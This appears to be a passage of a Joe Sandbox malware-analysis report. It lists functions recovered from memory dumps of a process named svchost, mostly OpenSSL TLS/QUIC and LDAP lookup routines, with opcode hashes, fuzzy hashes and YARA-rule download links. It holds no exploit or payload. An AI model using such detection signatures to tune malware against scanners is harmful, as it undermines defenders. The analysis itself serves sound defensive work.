                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 313767242-0
                                                                                            • Opcode ID: f2601ce0e451a39edef9d8f9ef1887be3943e43da16021d90865413426156ae3
                                                                                            • Instruction ID: 84f4bb64240038b9d9294f60f1be74b47ec7adb7c480484e367d09b7ad63e21f
                                                                                            • Opcode Fuzzy Hash: f2601ce0e451a39edef9d8f9ef1887be3943e43da16021d90865413426156ae3
                                                                                            • Instruction Fuzzy Hash: A9314C7270AB818AFB608F60E8507ED7362FB84744F48503ADA4E57B9ADF39D548C718
                                                                                            Function 00007FFDA3688426 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA368DD7A
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA368DD92
                                                                                            • CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFDA368DE90
                                                                                              • Part of subcall function 00007FFDA368C5A0: ERR_new.LIBCRYPTO-3-X64(?,?,00007FFDA368DD65), ref: 00007FFDA368C62D
                                                                                              • Part of subcall function 00007FFDA368C5A0: ERR_set_debug.LIBCRYPTO-3-X64(?,?,00007FFDA368DD65), ref: 00007FFDA368C645
                                                                                              • Part of subcall function 00007FFDA3609F90: CRYPTO_malloc.LIBCRYPTO-3-X64 ref: 00007FFDA360A012
                                                                                              • Part of subcall function 00007FFDA3609F90: memset.VCRUNTIME140 ref: 00007FFDA360A040
                                                                                              • Part of subcall function 00007FFDA3609F90: memcpy.VCRUNTIME140 ref: 00007FFDA360A075
                                                                                              • Part of subcall function 00007FFDA3609F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFDA360A091
                                                                                              • Part of subcall function 00007FFDA3609F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFDA360A0EA
                                                                                              • Part of subcall function 00007FFDA3609F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFDA360A162
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_clear_free$R_newR_set_debug$O_mallocmemcpymemset
                                                                                            • String ID: ssl\statem\statem_srvr.c$tls_process_client_key_exchange
                                                                                            • API String ID: 1067245891-2683773349
                                                                                            • Opcode ID: 1c0b79c31e8a9f3943a6edc68d542a649b7dabfdcd0a743967adedc52196357a
                                                                                            • Instruction ID: fd3d61a927900c518ed58da129e8982cf71b062e49cbff206afe721cd78af9d0
                                                                                            • Opcode Fuzzy Hash: 1c0b79c31e8a9f3943a6edc68d542a649b7dabfdcd0a743967adedc52196357a
                                                                                            • Instruction Fuzzy Hash: 0B415061F1A74343F6A49B15A8253BA5293AF4CBC4F4C7431EA0E677D7CE2EE4418318
                                                                                            Function 00007FFDA36023C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleO_free$CriticalDeleteSection
                                                                                            • String ID: crypto\thread\arch\thread_win.c
                                                                                            • API String ID: 229191846-2915021490
                                                                                            • Opcode ID: fc00095f480be750e8aaaf4deb890c97a185db73c58a544a99d5a012bd22efca
                                                                                            • Instruction ID: f55e1dd21f3d6aa4542bca2bf9e5694dfd59c910131a45340619016a2c9a29d4
                                                                                            • Opcode Fuzzy Hash: fc00095f480be750e8aaaf4deb890c97a185db73c58a544a99d5a012bd22efca
                                                                                            • Instruction Fuzzy Hash: 12015E36B0AA4281FB409F61F8A136C6361AF49F88F0C6031DA4D17796DF3DD4548315
                                                                                            Function 00007FFDA3605380 Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_ctrl
                                                                                            • String ID:
                                                                                            • API String ID: 3605655398-0
                                                                                            • Opcode ID: a27e86e80905aea8330afc17b001a7515fd857808354a942692a85eeb138a060
                                                                                            • Instruction ID: 6b7d42522a6c5101c7bb5e7bd427adc051c0a07a35bb12ef4d63014da31380d0
                                                                                            • Opcode Fuzzy Hash: a27e86e80905aea8330afc17b001a7515fd857808354a942692a85eeb138a060
                                                                                            • Instruction Fuzzy Hash: 8531B33372A28186EB88DB76D5A1BFD6692FB89B84F086035DB4D57792DF3994108304
                                                                                            Function 00007FFDA36793A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: D_get_sizeO_ctrlR_newR_set_debug
                                                                                            • String ID: ssl\statem\statem_clnt.c$tls_client_key_exchange_post_work
                                                                                            • API String ID: 1235234083-4270237895
                                                                                            • Opcode ID: 0816d56e2509e0f4ae9fa03be8bdc46a30fb3ab9f700cd7b5f453e55606019e1
                                                                                            • Instruction ID: 141f67040edcadafd8e708a38c6fdd8dff2f52fa610940b3f58a230535202450
                                                                                            • Opcode Fuzzy Hash: 0816d56e2509e0f4ae9fa03be8bdc46a30fb3ab9f700cd7b5f453e55606019e1
                                                                                            • Instruction Fuzzy Hash: 4B818431B0A74289FB749A15D4647B823D2EB41B84FAC6136C90DA7397DF2EE491C318
                                                                                            Function 00007FFDA36D2860 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetUserNameA.ADVAPI32 ref: 00007FFDA36D289F
                                                                                            • GetLastError.KERNEL32 ref: 00007FFDA36D28AE
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFDA36D1C16,?,?,?,?,00007FFDA36D1CA5), ref: 00007FFDA36E2CE8
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2D10
                                                                                              • Part of subcall function 00007FFDA36E2CD0: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2D31
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D28CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLastNameUser_strduplibintl_dgettext
                                                                                            • String ID: out of memory$user name lookup failure: error code %lu
                                                                                            • API String ID: 545883064-2849081202
                                                                                            • Opcode ID: 48445d2c40410990b2fc367bc245d2915f73ef1ad6e122f3025d8d8df7d0b452
                                                                                            • Instruction ID: d8df994b7a2a0b0e5d2b1c46436b5a06e0955ecb9035722db2b2a39a132d739a
                                                                                            • Opcode Fuzzy Hash: 48445d2c40410990b2fc367bc245d2915f73ef1ad6e122f3025d8d8df7d0b452
                                                                                            • Instruction Fuzzy Hash: A2114232B1AA8282FEA09B15F8253B56352BF58B84F4C2435D94D56756EF3EE1088708
                                                                                            Function 00007FFDA360D360 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_zalloc$O_free
                                                                                            • String ID: ssl\ssl_cert.c
                                                                                            • API String ID: 1411191933-188639428
                                                                                            • Opcode ID: 81b3e0db84fb033b429e26bebb1a7555325c1882484021551ba5a7b1b61c1967
                                                                                            • Instruction ID: 6ba1f31ccaa4e8d05c63b50abb5ddec163aa88e92158d29ef52e99898469f34e
                                                                                            • Opcode Fuzzy Hash: 81b3e0db84fb033b429e26bebb1a7555325c1882484021551ba5a7b1b61c1967
                                                                                            • Instruction Fuzzy Hash: 3A118C7271674286FB81CB24E4A53A873A1FB09B84F4CA131CA4D07356EF7EE554C718
                                                                                            Function 00007FFDA3617360 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CRYPTO_free_ex_data.LIBCRYPTO-3-X64(?,00007FFDA3647F02,?,00007FFDA3643609), ref: 00007FFDA361738E
                                                                                            • CRYPTO_THREAD_lock_free.LIBCRYPTO-3-X64(?,00007FFDA3647F02,?,00007FFDA3643609), ref: 00007FFDA36173AF
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFDA3647F02,?,00007FFDA3643609), ref: 00007FFDA36173C4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: D_lock_freeO_freeO_free_ex_data
                                                                                            • String ID: ssl\ssl_lib.c
                                                                                            • API String ID: 1442806380-1984206432
                                                                                            • Opcode ID: e4832274bbdca2be7ebb53921d75cb31a838a226735c15531aee403aa6de7e64
                                                                                            • Instruction ID: 5349dcf85be0d1189159baad79fa63f26f6226064acf8fcee8c3bf2932554eba
                                                                                            • Opcode Fuzzy Hash: e4832274bbdca2be7ebb53921d75cb31a838a226735c15531aee403aa6de7e64
                                                                                            • Instruction Fuzzy Hash: 63F01265B0B60246FA54AB7998611B81312EF48B55F1C2135ED0E573D7DE1ED8518248
                                                                                            Function 00007FFDA3620450 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free$Y_free
                                                                                            • String ID: ssl\ssl_lib.c
                                                                                            • API String ID: 3642664693-1984206432
                                                                                            • Opcode ID: 6d0946d844a4db522dc917eab90d6050f22cb33342ced9b0e25f45acba3a926a
                                                                                            • Instruction ID: f126ba0423806aec2751c5c557baaf977ab61b7ee4be4e9351099109cfb32ca0
                                                                                            • Opcode Fuzzy Hash: 6d0946d844a4db522dc917eab90d6050f22cb33342ced9b0e25f45acba3a926a
                                                                                            • Instruction Fuzzy Hash: 17E09AA1F0720296FE00F761C8A26B86B129F48B84F4C7031D90C67793DE1EE996C309
                                                                                            Function 00007FFDA3653380 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free
                                                                                            • String ID: ssl\quic\quic_srtm.c
                                                                                            • API String ID: 2581946324-1571964953
                                                                                            • Opcode ID: 5b17fc0959d40293f1fb9f52036a93e303e7a693c0bb234606a7881b31c3b62f
                                                                                            • Instruction ID: 737798cd1182c3d601a4289a178b39b876c4eeaa8ec2fd59e41f4658fc8160ea
                                                                                            • Opcode Fuzzy Hash: 5b17fc0959d40293f1fb9f52036a93e303e7a693c0bb234606a7881b31c3b62f
                                                                                            • Instruction Fuzzy Hash: 5CF0A920B1B68282FE50CA46D8A07B89222AF48BC4F1C2030ED4E17B87DE5EE5428704
                                                                                            Function 00007FFDA366B420 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free
                                                                                            • String ID: ssl\statem\extensions.c
                                                                                            • API String ID: 2581946324-3728926295
                                                                                            • Opcode ID: 1accfdfe4a94efb59a3313601236a7f2cdd8d76c14d7920cd6b5e9182a44a3e6
                                                                                            • Instruction ID: 93227b0b7822c4139911531a2401783e7cec50859248aef66509aa22fa0a6917
                                                                                            • Opcode Fuzzy Hash: 1accfdfe4a94efb59a3313601236a7f2cdd8d76c14d7920cd6b5e9182a44a3e6
                                                                                            • Instruction Fuzzy Hash: 4DF092B2F03641C7F790DB29D4583A42291EB48B54F5C1234DA5C8B3D3EF6A85E28715
                                                                                            Function 00007FFDA36013A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free
                                                                                            • String ID: crypto\packet.c
                                                                                            • API String ID: 2581946324-224687097
                                                                                            • Opcode ID: 850b09b68a2f926bf784a38b14cb93f051b66521e308ea84b3355f2be20b7ec1
                                                                                            • Instruction ID: 7399c8e9770df6d160a0bdc992104358e68045d3b106f5932400915b1850bd2e
                                                                                            • Opcode Fuzzy Hash: 850b09b68a2f926bf784a38b14cb93f051b66521e308ea84b3355f2be20b7ec1
                                                                                            • Instruction Fuzzy Hash: 49E0D865B1A64282FE54DB55E4A57785261FF5DBD4F1C2030EE4D47B83DF2DD4508304
                                                                                            Function 00007FFDA36423F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free
                                                                                            • String ID: ssl\quic\quic_user.c
                                                                                            • API String ID: 2581946324-2291346005
                                                                                            • Opcode ID: 7f3c0570978d6f441575d252adf1a72b58b56be861ec3d7da58e6de7f37517db
                                                                                            • Instruction ID: 24915e3e8ca1755a930ea1bd67e38efcc961960906ae970d6f1af26e2d50d703
                                                                                            • Opcode Fuzzy Hash: 7f3c0570978d6f441575d252adf1a72b58b56be861ec3d7da58e6de7f37517db
                                                                                            • Instruction Fuzzy Hash: 6AC08055F1704357FD44B314D5652B46552EF44304F8CE470D10C13783DD0EA9594714
                                                                                            Function 00007FFDA3624380 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: D_unlockD_write_lock
                                                                                            • String ID:
                                                                                            • API String ID: 1724170673-0
                                                                                            • Opcode ID: 979abf4c36315698262437b1d788520d1c39c78566ec60faab6647c1b7c5aa6c
                                                                                            • Instruction ID: 9d56986b9866bca13346d5a9336644d24f380770fc42b23aa3d89362caef7d99
                                                                                            • Opcode Fuzzy Hash: 979abf4c36315698262437b1d788520d1c39c78566ec60faab6647c1b7c5aa6c
                                                                                            • Instruction Fuzzy Hash: EF11E721F0668182FA89CB66E5913BC5255FF88B94F4C2231EF2D5B3D6DE29E4A14304
                                                                                            Function 00007FFDA36D97D0 Relevance: 105.4, APIs: 41, Strings: 19, Instructions: 432COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D9813
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D986E
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFDA36D1C16,?,?,?,?,00007FFDA36D1CA5), ref: 00007FFDA36E2CE8
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2D10
                                                                                              • Part of subcall function 00007FFDA36E2CD0: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2D31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$_strdupfreelibintl_dgettext
                                                                                            • String ID: attribute has no values on LDAP lookup$base$could not create LDAP structure$invalid LDAP URL "%s": invalid port number$invalid LDAP URL "%s": missing distinguished name$invalid LDAP URL "%s": must have exactly one attribute$invalid LDAP URL "%s": must have search scope (base/one/sub)$invalid LDAP URL "%s": no filter$invalid LDAP URL "%s": scheme must be ldap://$invalid connection option "%s"$ldap://$localhost$lookup on LDAP server failed: %s$more than one entry found on LDAP lookup$no entry found on LDAP lookup$one$out of memory$sub$unterminated quoted string in connection info string
                                                                                            • API String ID: 3307937308-2289937810
                                                                                            • Opcode ID: d945ba071056f28b8dc67d6366e3f13f9fe005f8d8993e87f1bef95e5274050b
                                                                                            • Instruction ID: dbef48ef09f2a8adfc273d354dc7b578fbc3c96679f265f0aa0540ac75f6daae
                                                                                            • Opcode Fuzzy Hash: d945ba071056f28b8dc67d6366e3f13f9fe005f8d8993e87f1bef95e5274050b
                                                                                            • Instruction Fuzzy Hash: CC126126B0FB8281FA149B15E4603B967A2EF85BC4F4C6031C94E27796EF7EE545C708
                                                                                            Function 00007FFDA363D400 Relevance: 98.5, APIs: 18, Strings: 38, Instructions: 451COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_set_debug$E_newE_saveR_newR_set_error
                                                                                            • String ID: INITIAL_SCID was not sent but is required$ORIG_DCID was not sent but is required$QUIC error code: 0x%llx%s%s%s, reason: "%s"$RETRY_SCID was not sent but is required$ack_delay_exponent$active_connection_id_limit$bad transport parameter$ch_on_transport_params$connection_id$disable_active_migration$initial_max_data$initial_max_stream_data_bidi_local$initial_max_stream_data_bidi_remote$initial_max_stream_data_uni$initial_max_streams_bidi$initial_max_streams_uni$internal error$internal error (packet buf init)$ip_v4$ip_v6$max_ack_delay$max_idle_timeout$max_udp_payload_size$multiple transport parameter extensions$original_destination_connection_id$original_source_connection_id$ossl_quic_channel_raise_protocol_error_loc$owner$parameters_set$port_v4$port_v6$preferred_addr$remote$retry_source_connection_id$ssl\quic\quic_channel.c$stateless_reset_token$transport$transport:parameters_set
